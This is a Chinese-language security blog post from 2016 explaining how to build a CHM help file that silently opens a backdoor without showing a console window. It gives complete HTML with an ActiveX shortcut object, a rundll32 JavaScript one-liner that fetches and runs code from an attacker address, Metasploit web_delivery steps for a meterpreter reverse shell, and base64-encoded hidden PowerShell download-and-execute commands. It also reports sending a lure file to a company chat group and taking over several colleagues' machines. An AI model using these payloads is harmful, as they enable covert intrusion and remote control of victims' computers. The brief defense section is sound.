高階組合技打造“完美” 捆綁後門

wyzsk發表於2020-08-19
作者: Evi1cg · 2016/03/31 11:30

0x00 簡介


之前寫過一篇關於客戶端釣魚的文章:《使用powershell Client進行有效釣魚》中,在使用各個Client進行測試的過程中,個人發現CHM檔案是最好用的一個,但是其缺點就是會彈黑框,這樣就會讓被攻擊者察覺。那麼怎麼讓他不彈黑框呢?那就是本文要介紹的內容啦~

0x01 CHM 簡介


在介紹怎麼使用CHM來作為後門之前,首先要知道CMH是什麼東西。

CHM(Compiled Help Manual)即“已編譯的幫助檔案”。它是微軟新一代的幫助檔案格式,利用HTML作源文,把幫助內容以類似資料庫的形式編譯儲存。CHM支援Javas cript、VBs cript、ActiveX、Java Applet、Flash、常見圖形檔案(GIF、JPEG、PNG)、音訊影片檔案(MID、WAV、AVI)等等,並可以透過URL與Internet聯絡在一起。因為使用方便,形式多樣也被採用作為電子書的格式。

0x02 CHM 製作


CHM的製作方法很多。有多款工具可以使用,這裡就不在做詳細的介紹了。本次測試使用了EasyCHM來製作CHM檔案,使用起來非常簡單。

新建如下目錄,檔案內容隨意:

Alt text

開啟EasyCHM,新建->瀏覽。選擇該目錄。預設檔案型別:

Alt text

點選確認,即可看到預覽的CHM檔案:

Alt text

選擇編譯,即可編譯成CHM檔案。

0x03 CHM Execute Command


[email protected] 在twitter上發了一個demo,透過CHM執行計算器:

Alt text

利用程式碼如下:

#!html
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

將以上程式碼寫入html,置於工程目錄進行編譯,生成CHM檔案,執行此檔案,彈出計算器:

Alt text

0x04 去除彈框


有測試過nishang Out-CHM 的同學會發現,執行生成的CHM檔案的時候會看到明顯的彈框。就像這樣:

Alt text

某個晚上突然腦洞了一下,想到了一個好的方式來讓他不顯示彈框,即結合使用JavaScript Backdoor。經過測試,成功實現在不彈框的情況下獲取meterpreter會話,此次測試使用一個我修改過的python版 JSRat.ps1 ,地址為:MyJSRat。使用方式詳見 readme。

以下為完整的測試過程:

1、結合CHM + JSBackdoor

使用互動模式的JSRat server:

#!bash
python MyJSRat.py -i 192.168.1.101 -p 8080

Alt text

訪問 http://192.168.1.101:8080/wtf 獲取攻擊程式碼如下:

#!bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

經過多次測試,成功將以上命令寫入chm,其Html程式碼為:

#!html
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

編譯以後執行,可以成功獲取JS互動shell:

Alt text

直接執行cmd /c command 是會有黑框的,可以使用run來避免顯示黑框。執行run以後,輸入 whoami > e:\1.txt 之後透過read 來獲取回顯。

2、獲取meterpreter會話

此次測試獲取meterpreter會話的方式是透過執行powershell命令,直接獲取,當獲取客戶端JS 互動shell之後自動執行powershell命令,獲取meterpreter會話。具體操作如下:

開啟MSF web_delivery:

#!bash
 ~  msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 192.168.1.101:6666
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.101:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

裝有powershell的客戶端執行以下命令則可獲取meterpreter會話:

#!bash
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

由於存在特殊字元,我們可以把以上程式碼編碼為base64格式,將以下程式碼存入power.txt

#!bash
$n=new-object net.webclient;
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $n.downloadstring('http://192.168.1.101:8081/');

執行以下命令:

#!bash
cat power.txt | iconv --to-code UTF-16LE |base64

Alt text

最終要執行的powershell命令為:

#!bash
powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==

使用執行命令模式直接獲取meterpreter會話:

#!bash
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="

測試過程中,從執行CHM到獲取meterpreter,客戶端無明顯異常,全程無黑框彈出,獲取到meterpreter會話如下圖:

Alt text

3、是否被殺?

可能很多人會問,會不會被殺,下面是virscan的查殺結果:

http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba

Alt text

0x05 利用場景


一張圖說明(讓我猜猜你會不會點):

Alt text

注: 隨便找了幾個漏洞利用工具修改了檔名,並不代表原作者分享的工具有問題。

0x06 實際測試


是用上述方式製作chm檔案,命名為一個比較有吸引力的名字,比如在公司技術群發了一個名字為"製作免殺後門.chm"的檔案,實際測試結果如下圖:

成功獲取多個人的meterpreter會話。

0x07 防禦


目前我還沒查到什麼防禦的姿勢,知道的小夥伴可以分享一下。最好就是提高個人安全意識,對於這類檔案,多注意一下,儘量別亂點,如果非要點,可以放到虛擬機器裡面。使用procexp.exe可以看到存在後門的chm檔案會開啟新的程式:

Alt text

對於碰到這種後門,怎麼溯源呢,其實也很簡單,chm是可以反編譯為html的。 使用windows自帶的hh.exe 則可進行反編譯。命令如下:

#!bash
C:\Users\evi1cg\Desktop>hh -decompile test poc.chm #test 為當前目錄的test資料夾

執行結果如下:

0x08 小結


此次測試就是對一些已知的攻擊手法進行結合,結果是讓此捆綁後門更加隱蔽,近乎“完美”,美中不足的是在檔案開啟的時候會出現短暫的卡頓。有時候小漏洞結合起來能造成大危害,小手法結合起來也能成大殺器。本著分享的精神將此姿勢介紹,希望小夥伴們能免受其害。

0x09 參考


  1. https://twitter.com/ithurricanept/status/534993743196090368
  2. https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
  3. /tips/?id=11764
  4. https://github.com/samratashok/nishang

本文由evi1cg原創並首發於烏雲drops,轉載請註明

本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章